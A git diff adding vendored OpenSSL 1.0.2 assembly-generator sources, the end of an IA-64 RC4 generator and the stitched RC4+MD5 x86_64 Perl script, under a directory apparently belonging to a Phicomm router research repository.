+		ADDP		InPtr = 0, InputBuffer
+		ADDP		OutPtr = 0, OutputBuffer
+		mov		RetVal = r0
+	}
+	;;
+	{
+		.mmi
+		lfetch.nt1	[InPrefetch], 0x80
+		ADDP		OutPrefetch = 0, OutputBuffer
+	}
+	{               // Return 0 if the input length is nonsensical
+        	.mib
+		ADDP		StateTable = 0, StateTable
+        	cmp.ge.unc  	L_NOK, L_OK = r0, DataLen
+	(L_NOK) br.ret.sptk.few rp
+	}
+	;;
+	{
+        	.mib
+        	cmp.eq.or  	L_NOK, L_OK = r0, InPtr
+        	cmp.eq.or  	L_NOK, L_OK = r0, OutPtr
+		nop		0x0
+	}
+	{
+		.mib
+        	cmp.eq.or  	L_NOK, L_OK = r0, StateTable
+		nop		0x0
+	(L_NOK) br.ret.sptk.few rp
+	}
+	;;
+		LKEY		I[1] = [KTable], SZ
+/* Prefetch the state-table. It contains 256 elements of size SZ */
+
+#if SZ == 1
+		ADDP		tmp0 = 1*128, StateTable
+#elif SZ == 2
+		ADDP		tmp0 = 3*128, StateTable
+		ADDP		tmp1 = 2*128, StateTable
+#elif SZ == 4
+		ADDP		tmp0 = 7*128, StateTable
+		ADDP		tmp1 = 6*128, StateTable
+#elif SZ == 8
+		ADDP		tmp0 = 15*128, StateTable
+		ADDP		tmp1 = 14*128, StateTable
+#endif
+		;;
+#if SZ >= 8
+		lfetch.fault.nt1		[tmp0], -256	// 15
+		lfetch.fault.nt1		[tmp1], -256;;
+		lfetch.fault.nt1		[tmp0], -256	// 13
+		lfetch.fault.nt1		[tmp1], -256;;
+		lfetch.fault.nt1		[tmp0], -256	// 11
+		lfetch.fault.nt1		[tmp1], -256;;
+		lfetch.fault.nt1		[tmp0], -256	//  9
+		lfetch.fault.nt1		[tmp1], -256;;
+#endif
+#if SZ >= 4
+		lfetch.fault.nt1		[tmp0], -256	//  7
+		lfetch.fault.nt1		[tmp1], -256;;
+		lfetch.fault.nt1		[tmp0], -256	//  5
+		lfetch.fault.nt1		[tmp1], -256;;
+#endif
+#if SZ >= 2
+		lfetch.fault.nt1		[tmp0], -256	//  3
+		lfetch.fault.nt1		[tmp1], -256;;
+#endif
+	{
+		.mii
+		lfetch.fault.nt1		[tmp0]		//  1
+		add		I[1]=1,I[1];;
+		zxt1		I[1]=I[1]
+	}
+	{
+		.mmi
+		lfetch.nt1	[InPrefetch], 0x80
+		lfetch.excl.nt1	[OutPrefetch], 0x80
+		.save		pr, PRSave
+		mov		PRSave = pr
+	} ;;
+	{
+		.mmi
+		lfetch.excl.nt1	[OutPrefetch], 0x80
+		LKEY		J = [KTable], SZ
+		ADDP		EndPtr = DataLen, InPtr
+	}  ;;
+	{
+		.mmi
+		ADDP		EndPtr = -1, EndPtr	// Make it point to
+							// last data byte.
+		mov		One = 1
+		.save		ar.lc, LCSave
+		mov		LCSave = ar.lc
+		.body
+	} ;;
+	{
+		.mmb
+		sub		Remainder = 0, OutPtr
+		cmp.gtu		pSmall, p0 = $threshold, DataLen
+(pSmall)	br.cond.dpnt	.rc4Remainder		// Data too small for
+							// big loop.
+	} ;;
+	{
+		.mmi
+		and		Remainder = 0x7, Remainder
+		;;
+		cmp.eq		pAligned, pUnaligned = Remainder, r0
+		nop		0x0
+	} ;;
+	{
+		.mmb
+.pred.rel	"mutex",pUnaligned,pAligned
+(pUnaligned)	add		Remainder = -1, Remainder
+(pAligned)	sub		Remainder = EndPtr, InPtr
+(pAligned)	br.cond.dptk.many .rc4Aligned
+	} ;;
+	{
+		.mmi
+		nop		0x0
+		nop		0x0
+		mov.i		ar.lc = Remainder
+	}
+
+/* Do the initial few bytes via the compact, modulo-scheduled loop
+   until the output pointer is 8-byte-aligned.  */
+
+		MODSCHED_RC4_PROLOGUE
+		MODSCHED_RC4_LOOP(.RC4AlignLoop)
+
+	{
+		.mib
+		sub		Remainder = EndPtr, InPtr
+		zxt1		IFinal = IFinal
+		clrrrb				// Clear CFM.rrb.pr so
+		;;				// next "mov pr.rot = N"
+						// does the right thing.
+	}
+	{
+		.mmi
+		mov		I[1] = IFinal
+		nop		0x0
+		nop		0x0
+	} ;;
+
+
+.rc4Aligned:
+
+/*
+   Unrolled loop count = (Remainder - ($unroll_count+1)*$phases)/($unroll_count*$phases)
+ */
+
+	{
+		.mlx
+		add	LoopCount = 1 - ($unroll_count + 1)*$phases, Remainder
+		movl		Remainder = 0xaaaaaaaaaaaaaaab
+	} ;;
+	{
+		.mmi
+		setf.sig	f6 = LoopCount		// M2, M3	6 cyc
+		setf.sig	f7 = Remainder		// M2, M3	6 cyc
+		nop		0x0
+	} ;;
+	{
+		.mfb
+		nop		0x0
+		xmpy.hu		f6 = f6, f7
+		nop		0x0
+	} ;;
+	{
+		.mmi
+		getf.sig	LoopCount = f6;;	// M2		5 cyc
+		nop		0x0
+		shr.u		LoopCount = LoopCount, 4
+	} ;;
+	{
+		.mmi
+		nop		0x0
+		nop		0x0
+		mov.i		ar.lc = LoopCount
+	} ;;
+
+/* Now comes the unrolled loop: */
+
+.rc4Prologue:
+___
+
+$iteration = 0;
+
+# Generate the prologue:
+$predicates = 1;
+for ($i = 0; $i < $phases; ++$i) {
+    &emit_body (\$code, \$bypass, $iteration++, $predicates);
+    $predicates = ($predicates << 1) | 1;
+}
+
+$code.=<<___;
+.rc4Loop:
+___
+
+# Generate the body:
+for ($i = 0; $i < $unroll_count*$phases; ++$i) {
+    &emit_body (\$code, \$bypass, $iteration++, $predicates);
+}
+
+$code.=<<___;
+.rc4Epilogue:
+___
+
+# Generate the epilogue:
+for ($i = 0; $i < $phases; ++$i) {
+    $predicates <<= 1;
+    &emit_body (\$code, \$bypass, $iteration++, $predicates);
+}
+
+$code.=<<___;
+	{
+		.mmi
+		lfetch.nt1	[EndPtr]	// fetch line with last byte
+		mov		IFinal = I[1]
+		nop		0x0
+	}
+
+.rc4Remainder:
+	{
+		.mmi
+		sub		Remainder = EndPtr, InPtr	// Calculate
+								// # of bytes
+								// left - 1
+		nop		0x0
+		nop		0x0
+	} ;;
+	{
+		.mib
+		cmp.eq		pDone, p0 = -1, Remainder // done already?
+		mov.i		ar.lc = Remainder
+(pDone)		br.cond.dptk.few .rc4Complete
+	}
+
+/* Do the remaining bytes via the compact, modulo-scheduled loop */
+
+		MODSCHED_RC4_PROLOGUE
+		MODSCHED_RC4_LOOP(.RC4RestLoop)
+
+.rc4Complete:
+	{
+		.mmi
+		add		KTable = -SZ, KTable
+		add		IFinal = -1, IFinal
+		mov		ar.lc = LCSave
+	} ;;
+	{
+		.mii
+		SKEY		[KTable] = J,-SZ
+		zxt1		IFinal = IFinal
+		mov		pr = PRSave, 0x1FFFF
+	} ;;
+	{
+		.mib
+		SKEY		[KTable] = IFinal
+		add		RetVal = 1, r0
+		br.ret.sptk.few	rp
+	} ;;
+___
+
+# Last but not least, emit the code for the bypass-code of the unrolled loop:
+
+$code.=$bypass;
+
+$code.=<<___;
+	.endp RC4
+___
+
+print $code;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/asm/rc4-md5-x86_64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/asm/rc4-md5-x86_64.pl
new file mode 100644
index 0000000..272fa91
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/asm/rc4-md5-x86_64.pl
@@ -0,0 +1,632 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# June 2011
+#
+# This is RC4+MD5 "stitch" implementation. The idea, as spelled in
+# http://download.intel.com/design/intarch/papers/323686.pdf, is that
+# since both algorithms exhibit instruction-level parallelism, ILP,
+# below theoretical maximum, interleaving them would allow to utilize
+# processor resources better and achieve better performance. RC4
+# instruction sequence is virtually identical to rc4-x86_64.pl, which
+# is heavily based on submission by Maxim Perminov, Maxim Locktyukhin
+# and Jim Guilford of Intel. MD5 is fresh implementation aiming to
+# minimize register usage, which was used as "main thread" with RC4
+# weaved into it, one RC4 round per one MD5 round. In addition to the
+# stiched subroutine the script can generate standalone replacement
+# md5_block_asm_data_order and RC4. Below are performance numbers in
+# cycles per processed byte, less is better, for these the standalone
+# subroutines, sum of them, and stitched one:
+#
+#		RC4	MD5	RC4+MD5	stitch	gain
+# Opteron	6.5(*)	5.4	11.9	7.0	+70%(*)
+# Core2		6.5	5.8	12.3	7.7	+60%
+# Westmere	4.3	5.2	9.5	7.0	+36%
+# Sandy Bridge	4.2	5.5	9.7	6.8	+43%
+# Atom		9.3	6.5	15.8	11.1	+42%
+#
+# (*)	rc4-x86_64.pl delivers 5.3 on Opteron, so real improvement
+#	is +53%...
+
+my ($rc4,$md5)=(1,1);	# what to generate?
+my $D="#" if (!$md5);	# if set to "#", MD5 is stitched into RC4(),
+			# but its result is discarded. Idea here is
+			# to be able to use 'openssl speed rc4' for
+			# benchmarking the stitched subroutine... 
+
+my $flavour = shift;
+my $output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+my $win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; my $dir=$1; my $xlate;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+my ($dat,$in0,$out,$ctx,$inp,$len, $func,$nargs);
+
+if ($rc4 && !$md5) {
+  ($dat,$len,$in0,$out) = ("%rdi","%rsi","%rdx","%rcx");
+  $func="RC4";				$nargs=4;
+} elsif ($md5 && !$rc4) {
+  ($ctx,$inp,$len) = ("%rdi","%rsi","%rdx");
+  $func="md5_block_asm_data_order";	$nargs=3;
+} else {
+  ($dat,$in0,$out,$ctx,$inp,$len) = ("%rdi","%rsi","%rdx","%rcx","%r8","%r9");
+  $func="rc4_md5_enc";			$nargs=6;
+  # void rc4_md5_enc(
+  #		RC4_KEY *key,		#
+  #		const void *in0,	# RC4 input
+  #		void *out,		# RC4 output
+  #		MD5_CTX *ctx,		#
+  #		const void *inp,	# MD5 input
+  #		size_t len);		# number of 64-byte blocks
+}
+
+my @K=(	0xd76aa478,0xe8c7b756,0x242070db,0xc1bdceee,
+	0xf57c0faf,0x4787c62a,0xa8304613,0xfd469501,
+	0x698098d8,0x8b44f7af,0xffff5bb1,0x895cd7be,
+	0x6b901122,0xfd987193,0xa679438e,0x49b40821,
+
+	0xf61e2562,0xc040b340,0x265e5a51,0xe9b6c7aa,
+	0xd62f105d,0x02441453,0xd8a1e681,0xe7d3fbc8,
+	0x21e1cde6,0xc33707d6,0xf4d50d87,0x455a14ed,
+	0xa9e3e905,0xfcefa3f8,0x676f02d9,0x8d2a4c8a,
+
+	0xfffa3942,0x8771f681,0x6d9d6122,0xfde5380c,
+	0xa4beea44,0x4bdecfa9,0xf6bb4b60,0xbebfbc70,
+	0x289b7ec6,0xeaa127fa,0xd4ef3085,0x04881d05,
+	0xd9d4d039,0xe6db99e5,0x1fa27cf8,0xc4ac5665,
+
+	0xf4292244,0x432aff97,0xab9423a7,0xfc93a039,
+	0x655b59c3,0x8f0ccc92,0xffeff47d,0x85845dd1,
+	0x6fa87e4f,0xfe2ce6e0,0xa3014314,0x4e0811a1,
+	0xf7537e82,0xbd3af235,0x2ad7d2bb,0xeb86d391	);
+
+my @V=("%r8d","%r9d","%r10d","%r11d");	# MD5 registers
+my $tmp="%r12d";
+
+my @XX=("%rbp","%rsi");			# RC4 registers
+my @TX=("%rax","%rbx");
+my $YY="%rcx";
+my $TY="%rdx";
+
+my $MOD=32;				# 16, 32 or 64
+
+$code.=<<___;
+.text
+.align 16
+
+.globl	$func
+.type	$func,\@function,$nargs
+$func:
+	cmp	\$0,$len
+	je	.Labort
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	sub	\$40,%rsp
+.Lbody:
+___
+if ($rc4) {
+$code.=<<___;
+$D#md5#	mov	$ctx,%r11		# reassign arguments
+	mov	$len,%r12
+	mov	$in0,%r13
+	mov	$out,%r14
+$D#md5#	mov	$inp,%r15
+___
+    $ctx="%r11"	if ($md5);		# reassign arguments
+    $len="%r12";
+    $in0="%r13";
+    $out="%r14";
+    $inp="%r15"	if ($md5);
+    $inp=$in0	if (!$md5);
+$code.=<<___;
+	xor	$XX[0],$XX[0]
+	xor	$YY,$YY
+
+	lea	8($dat),$dat
+	mov	-8($dat),$XX[0]#b
+	mov	-4($dat),$YY#b
+
+	inc	$XX[0]#b
+	sub	$in0,$out
+	movl	($dat,$XX[0],4),$TX[0]#d
+___
+$code.=<<___ if (!$md5);
+	xor	$TX[1],$TX[1]
+	test	\$-128,$len
+	jz	.Loop1
+	sub	$XX[0],$TX[1]
+	and	\$`$MOD-1`,$TX[1]
+	jz	.Loop${MOD}_is_hot
+	sub	$TX[1],$len
+.Loop${MOD}_warmup:
+	add	$TX[0]#b,$YY#b
+	movl	($dat,$YY,4),$TY#d
+	movl	$TX[0]#d,($dat,$YY,4)
+	movl	$TY#d,($dat,$XX[0],4)
+	add	$TY#b,$TX[0]#b
+	inc	$XX[0]#b
+	movl	($dat,$TX[0],4),$TY#d
+	movl	($dat,$XX[0],4),$TX[0]#d
+	xorb	($in0),$TY#b
+	movb	$TY#b,($out,$in0)
+	lea	1($in0),$in0
+	dec	$TX[1]
+	jnz	.Loop${MOD}_warmup
+
+	mov	$YY,$TX[1]
+	xor	$YY,$YY
+	mov	$TX[1]#b,$YY#b
+
+.Loop${MOD}_is_hot:
+	mov	$len,32(%rsp)		# save original $len
+	shr	\$6,$len		# number of 64-byte blocks
+___
+  if ($D && !$md5) {			# stitch in dummy MD5
+    $md5=1;
+    $ctx="%r11";
+    $inp="%r15";
+    $code.=<<___;
+	mov	%rsp,$ctx
+	mov	$in0,$inp
+___
+  }
+}
+$code.=<<___;
+#rc4#	add	$TX[0]#b,$YY#b
+#rc4#	lea	($dat,$XX[0],4),$XX[1]
+	shl	\$6,$len
+	add	$inp,$len		# pointer to the end of input
+	mov	$len,16(%rsp)
+
+#md5#	mov	$ctx,24(%rsp)		# save pointer to MD5_CTX
+#md5#	mov	0*4($ctx),$V[0]		# load current hash value from MD5_CTX
+#md5#	mov	1*4($ctx),$V[1]
+#md5#	mov	2*4($ctx),$V[2]
+#md5#	mov	3*4($ctx),$V[3]
+	jmp	.Loop
+
+.align	16
+.Loop:
+#md5#	mov	$V[0],0*4(%rsp)		# put aside current hash value
+#md5#	mov	$V[1],1*4(%rsp)
+#md5#	mov	$V[2],2*4(%rsp)
+#md5#	mov	$V[3],$tmp		# forward reference
+#md5#	mov	$V[3],3*4(%rsp)
+___
+
+sub R0 {
+  my ($i,$a,$b,$c,$d)=@_;
+  my @rot0=(7,12,17,22);
+  my $j=$i%16;
+  my $k=$i%$MOD;
+  my $xmm="%xmm".($j&1);
+    $code.="	movdqu	($in0),%xmm2\n"		if ($rc4 && $j==15);
+    $code.="	add	\$$MOD,$XX[0]#b\n"	if ($rc4 && $j==15 && $k==$MOD-1);
+    $code.="	pxor	$xmm,$xmm\n"		if ($rc4 && $j<=1);
+    $code.=<<___;
+#rc4#	movl	($dat,$YY,4),$TY#d
+#md5#	xor	$c,$tmp
+#rc4#	movl	$TX[0]#d,($dat,$YY,4)
+#md5#	and	$b,$tmp
+#md5#	add	4*`$j`($inp),$a
+#rc4#	add	$TY#b,$TX[0]#b
+#rc4#	movl	`4*(($k+1)%$MOD)`(`$k==$MOD-1?"$dat,$XX[0],4":"$XX[1]"`),$TX[1]#d
+#md5#	add	\$$K[$i],$a
+#md5#	xor	$d,$tmp
+#rc4#	movz	$TX[0]#b,$TX[0]#d
+#rc4#	movl	$TY#d,4*$k($XX[1])
+#md5#	add	$tmp,$a
+#rc4#	add	$TX[1]#b,$YY#b
+#md5#	rol	\$$rot0[$j%4],$a
+#md5#	mov	`$j==15?"$b":"$c"`,$tmp		# forward reference
+#rc4#	pinsrw	\$`($j>>1)&7`,($dat,$TX[0],4),$xmm\n
+#md5#	add	$b,$a
+___
+    $code.=<<___ if ($rc4 && $j==15 && $k==$MOD-1);
+	mov	$YY,$XX[1]
+	xor	$YY,$YY				# keyword to partial register
+	mov	$XX[1]#b,$YY#b
+	lea	($dat,$XX[0],4),$XX[1]
+___
+    $code.=<<___ if ($rc4 && $j==15);
+	psllq	\$8,%xmm1
+	pxor	%xmm0,%xmm2
+	pxor	%xmm1,%xmm2
+___
+}
+sub R1 {
+  my ($i,$a,$b,$c,$d)=@_;
+  my @rot1=(5,9,14,20);
+  my $j=$i%16;
+  my $k=$i%$MOD;
+  my $xmm="%xmm".($j&1);
+    $code.="	movdqu	16($in0),%xmm3\n"	if ($rc4 && $j==15);
+    $code.="	add	\$$MOD,$XX[0]#b\n"	if ($rc4 && $j==15 && $k==$MOD-1);
+    $code.="	pxor	$xmm,$xmm\n"		if ($rc4 && $j<=1);
+    $code.=<<___;
+#rc4#	movl	($dat,$YY,4),$TY#d
+#md5#	xor	$b,$tmp
+#rc4#	movl	$TX[0]#d,($dat,$YY,4)
+#md5#	and	$d,$tmp
+#md5#	add	4*`((1+5*$j)%16)`($inp),$a
+#rc4#	add	$TY#b,$TX[0]#b
+#rc4#	movl	`4*(($k+1)%$MOD)`(`$k==$MOD-1?"$dat,$XX[0],4":"$XX[1]"`),$TX[1]#d
+#md5#	add	\$$K[$i],$a
+#md5#	xor	$c,$tmp
+#rc4#	movz	$TX[0]#b,$TX[0]#d
+#rc4#	movl	$TY#d,4*$k($XX[1])
+#md5#	add	$tmp,$a
+#rc4#	add	$TX[1]#b,$YY#b
+#md5#	rol	\$$rot1[$j%4],$a
+#md5#	mov	`$j==15?"$c":"$b"`,$tmp		# forward reference
+#rc4#	pinsrw	\$`($j>>1)&7`,($dat,$TX[0],4),$xmm\n
+#md5#	add	$b,$a
+___
+    $code.=<<___ if ($rc4 && $j==15 && $k==$MOD-1);
+	mov	$YY,$XX[1]
+	xor	$YY,$YY				# keyword to partial register
+	mov	$XX[1]#b,$YY#b
+	lea	($dat,$XX[0],4),$XX[1]
+___
+    $code.=<<___ if ($rc4 && $j==15);
+	psllq	\$8,%xmm1
+	pxor	%xmm0,%xmm3
+	pxor	%xmm1,%xmm3
+___
+}
+sub R2 {
+  my ($i,$a,$b,$c,$d)=@_;
+  my @rot2=(4,11,16,23);
+  my $j=$i%16;
+  my $k=$i%$MOD;
+  my $xmm="%xmm".($j&1);
+    $code.="	movdqu	32($in0),%xmm4\n"	if ($rc4 && $j==15);
+    $code.="	add	\$$MOD,$XX[0]#b\n"	if ($rc4 && $j==15 && $k==$MOD-1);
+    $code.="	pxor	$xmm,$xmm\n"		if ($rc4 && $j<=1);
+    $code.=<<___;
+#rc4#	movl	($dat,$YY,4),$TY#d
+#md5#	xor	$c,$tmp
+#rc4#	movl	$TX[0]#d,($dat,$YY,4)
+#md5#	xor	$b,$tmp
+#md5#	add	4*`((5+3*$j)%16)`($inp),$a
+#rc4#	add	$TY#b,$TX[0]#b
+#rc4#	movl	`4*(($k+1)%$MOD)`(`$k==$MOD-1?"$dat,$XX[0],4":"$XX[1]"`),$TX[1]#d
+#md5#	add	\$$K[$i],$a
+#rc4#	movz	$TX[0]#b,$TX[0]#d
+#md5#	add	$tmp,$a
+#rc4#	movl	$TY#d,4*$k($XX[1])
+#rc4#	add	$TX[1]#b,$YY#b
+#md5#	rol	\$$rot2[$j%4],$a
+#md5#	mov	`$j==15?"\\\$-1":"$c"`,$tmp	# forward reference
+#rc4#	pinsrw	\$`($j>>1)&7`,($dat,$TX[0],4),$xmm\n
+#md5#	add	$b,$a
+___
+    $code.=<<___ if ($rc4 && $j==15 && $k==$MOD-1);
+	mov	$YY,$XX[1]
+	xor	$YY,$YY				# keyword to partial register
+	mov	$XX[1]#b,$YY#b
+	lea	($dat,$XX[0],4),$XX[1]
+___
+    $code.=<<___ if ($rc4 && $j==15);
+	psllq	\$8,%xmm1
+	pxor	%xmm0,%xmm4
+	pxor	%xmm1,%xmm4
+___
+}
+sub R3 {
+  my ($i,$a,$b,$c,$d)=@_;
+  my @rot3=(6,10,15,21);
+  my $j=$i%16;
+  my $k=$i%$MOD;
+  my $xmm="%xmm".($j&1);
+    $code.="	movdqu	48($in0),%xmm5\n"	if ($rc4 && $j==15);
+    $code.="	add	\$$MOD,$XX[0]#b\n"	if ($rc4 && $j==15 && $k==$MOD-1);
+    $code.="	pxor	$xmm,$xmm\n"		if ($rc4 && $j<=1);
+    $code.=<<___;
+#rc4#	movl	($dat,$YY,4),$TY#d
+#md5#	xor	$d,$tmp
+#rc4#	movl	$TX[0]#d,($dat,$YY,4)
+#md5#	or	$b,$tmp
+#md5#	add	4*`((7*$j)%16)`($inp),$a
+#rc4#	add	$TY#b,$TX[0]#b
+#rc4#	movl	`4*(($k+1)%$MOD)`(`$k==$MOD-1?"$dat,$XX[0],4":"$XX[1]"`),$TX[1]#d
+#md5#	add	\$$K[$i],$a
+#rc4#	movz	$TX[0]#b,$TX[0]#d
+#md5#	xor	$c,$tmp
+#rc4#	movl	$TY#d,4*$k($XX[1])
+#md5#	add	$tmp,$a
+#rc4#	add	$TX[1]#b,$YY#b
+#md5#	rol	\$$rot3[$j%4],$a
+#md5#	mov	\$-1,$tmp			# forward reference
+#rc4#	pinsrw	\$`($j>>1)&7`,($dat,$TX[0],4),$xmm\n
+#md5#	add	$b,$a
+___
+    $code.=<<___ if ($rc4 && $j==15);
+	mov	$XX[0],$XX[1]
+	xor	$XX[0],$XX[0]			# keyword to partial register
+	mov	$XX[1]#b,$XX[0]#b
+	mov	$YY,$XX[1]
+	xor	$YY,$YY				# keyword to partial register
+	mov	$XX[1]#b,$YY#b
+	lea	($dat,$XX[0],4),$XX[1]
+	psllq	\$8,%xmm1
+	pxor	%xmm0,%xmm5
+	pxor	%xmm1,%xmm5
+___
+}
+
+my $i=0;
+for(;$i<16;$i++) { R0($i,@V); unshift(@V,pop(@V)); push(@TX,shift(@TX)); }
+for(;$i<32;$i++) { R1($i,@V); unshift(@V,pop(@V)); push(@TX,shift(@TX)); }
+for(;$i<48;$i++) { R2($i,@V); unshift(@V,pop(@V)); push(@TX,shift(@TX)); }
+for(;$i<64;$i++) { R3($i,@V); unshift(@V,pop(@V)); push(@TX,shift(@TX)); }
+
+$code.=<<___;
+#md5#	add	0*4(%rsp),$V[0]		# accumulate hash value
+#md5#	add	1*4(%rsp),$V[1]
+#md5#	add	2*4(%rsp),$V[2]
+#md5#	add	3*4(%rsp),$V[3]
+
+#rc4#	movdqu	%xmm2,($out,$in0)	# write RC4 output
+#rc4#	movdqu	%xmm3,16($out,$in0)
+#rc4#	movdqu	%xmm4,32($out,$in0)
+#rc4#	movdqu	%xmm5,48($out,$in0)
+#md5#	lea	64($inp),$inp
+#rc4#	lea	64($in0),$in0
+	cmp	16(%rsp),$inp		# are we done?
+	jb	.Loop
+
+#md5#	mov	24(%rsp),$len		# restore pointer to MD5_CTX
+#rc4#	sub	$TX[0]#b,$YY#b		# correct $YY
+#md5#	mov	$V[0],0*4($len)		# write MD5_CTX
+#md5#	mov	$V[1],1*4($len)
+#md5#	mov	$V[2],2*4($len)
+#md5#	mov	$V[3],3*4($len)
+___
+$code.=<<___ if ($rc4 && (!$md5 || $D));
+	mov	32(%rsp),$len		# restore original $len
+	and	\$63,$len		# remaining bytes
+	jnz	.Loop1
+	jmp	.Ldone
+	
+.align	16
+.Loop1:
+	add	$TX[0]#b,$YY#b
+	movl	($dat,$YY,4),$TY#d
+	movl	$TX[0]#d,($dat,$YY,4)
+	movl	$TY#d,($dat,$XX[0],4)
+	add	$TY#b,$TX[0]#b
+	inc	$XX[0]#b
+	movl	($dat,$TX[0],4),$TY#d
+	movl	($dat,$XX[0],4),$TX[0]#d
+	xorb	($in0),$TY#b
+	movb	$TY#b,($out,$in0)
+	lea	1($in0),$in0
+	dec	$len
+	jnz	.Loop1
+
+.Ldone:
+___
+$code.=<<___;
+#rc4#	sub	\$1,$XX[0]#b
+#rc4#	movl	$XX[0]#d,-8($dat)
+#rc4#	movl	$YY#d,-4($dat)
+
+	mov	40(%rsp),%r15
+	mov	48(%rsp),%r14
+	mov	56(%rsp),%r13
+	mov	64(%rsp),%r12
+	mov	72(%rsp),%rbp
+	mov	80(%rsp),%rbx
+	lea	88(%rsp),%rsp
+.Lepilogue:
+.Labort:
+	ret
+.size $func,.-$func
+___
+
+if ($rc4 && $D) {	# sole purpose of this section is to provide
+			# option to use the generated module as drop-in
+			# replacement for rc4-x86_64.pl for debugging
+			# and testing purposes...
+my ($idx,$ido)=("%r8","%r9");
+my ($dat,$len,$inp)=("%rdi","%rsi","%rdx");
+
+$code.=<<___;
+.globl	RC4_set_key
+.type	RC4_set_key,\@function,3
+.align	16
+RC4_set_key:
+	lea	8($dat),$dat
+	lea	($inp,$len),$inp
+	neg	$len
+	mov	$len,%rcx
+	xor	%eax,%eax
+	xor	$ido,$ido
+	xor	%r10,%r10
+	xor	%r11,%r11
+	jmp	.Lw1stloop
+
+.align	16
+.Lw1stloop:
+	mov	%eax,($dat,%rax,4)
+	add	\$1,%al
+	jnc	.Lw1stloop
+
+	xor	$ido,$ido
+	xor	$idx,$idx
+.align	16
+.Lw2ndloop:
+	mov	($dat,$ido,4),%r10d
+	add	($inp,$len,1),$idx#b
+	add	%r10b,$idx#b
+	add	\$1,$len
+	mov	($dat,$idx,4),%r11d
+	cmovz	%rcx,$len
+	mov	%r10d,($dat,$idx,4)
+	mov	%r11d,($dat,$ido,4)
+	add	\$1,$ido#b
+	jnc	.Lw2ndloop
+
+	xor	%eax,%eax
+	mov	%eax,-8($dat)
+	mov	%eax,-4($dat)
+	ret
+.size	RC4_set_key,.-RC4_set_key
+
+.globl	RC4_options
+.type	RC4_options,\@abi-omnipotent
+.align	16
+RC4_options:
+	lea	.Lopts(%rip),%rax
+	ret
+.align	64
+.Lopts:
+.asciz	"rc4(64x,int)"
+.align	64
+.size	RC4_options,.-RC4_options
+___
+}
+# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
+#		CONTEXT *context,DISPATCHER_CONTEXT *disp)
+if ($win64) {
+my $rec="%rcx";
+my $frame="%rdx";
+my $context="%r8";
+my $disp="%r9";
+
+$code.=<<___;
+.extern	__imp_RtlVirtualUnwind
+.type	se_handler,\@abi-omnipotent
+.align	16
+se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	lea	.Lbody(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip<.Lbody
+	jb	.Lin_prologue
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	lea	.Lepilogue(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip>=.Lepilogue
+	jae	.Lin_prologue
+
+	mov	40(%rax),%r15
+	mov	48(%rax),%r14
+	mov	56(%rax),%r13
+	mov	64(%rax),%r12
+	mov	72(%rax),%rbp
+	mov	80(%rax),%rbx
+	lea	88(%rax),%rax
+
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+	mov	%r12,216($context)	# restore context->R12
+	mov	%r13,224($context)	# restore context->R12
+	mov	%r14,232($context)	# restore context->R14
+	mov	%r15,240($context)	# restore context->R15
+
+.Lin_prologue:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+	mov	40($disp),%rdi		# disp->ContextRecord
+	mov	$context,%rsi		# context
+	mov	\$154,%ecx		# sizeof(CONTEXT)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	$disp,%rsi
+	xor	%rcx,%rcx		# arg1, UNW_FLAG_NHANDLER
+	mov	8(%rsi),%rdx		# arg2, disp->ImageBase
+	mov	0(%rsi),%r8		# arg3, disp->ControlPc
+	mov	16(%rsi),%r9		# arg4, disp->FunctionEntry
+	mov	40(%rsi),%r10		# disp->ContextRecord
+	lea	56(%rsi),%r11		# &disp->HandlerData
+	lea	24(%rsi),%r12		# &disp->EstablisherFrame
+	mov	%r10,32(%rsp)		# arg5
+	mov	%r11,40(%rsp)		# arg6
+	mov	%r12,48(%rsp)		# arg7
+	mov	%rcx,56(%rsp)		# arg8, (NULL)
+	call	*__imp_RtlVirtualUnwind(%rip)
+
+	mov	\$1,%eax		# ExceptionContinueSearch
+	add	\$64,%rsp
+	popfq
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbp
+	pop	%rbx
+	pop	%rdi
+	pop	%rsi
+	ret
+.size	se_handler,.-se_handler
+
+.section	.pdata
+.align	4
+	.rva	.LSEH_begin_$func
+	.rva	.LSEH_end_$func
+	.rva	.LSEH_info_$func
+
+.section	.xdata
+.align	8
+.LSEH_info_$func:
+	.byte	9,0,0,0
+	.rva	se_handler
+___
+}
+
+sub reg_part {
+my ($reg,$conv)=@_;
+    if ($reg =~ /%r[0-9]+/)     { $reg .= $conv; }
+    elsif ($conv eq "b")        { $reg =~ s/%[er]([^x]+)x?/%$1l/;       }
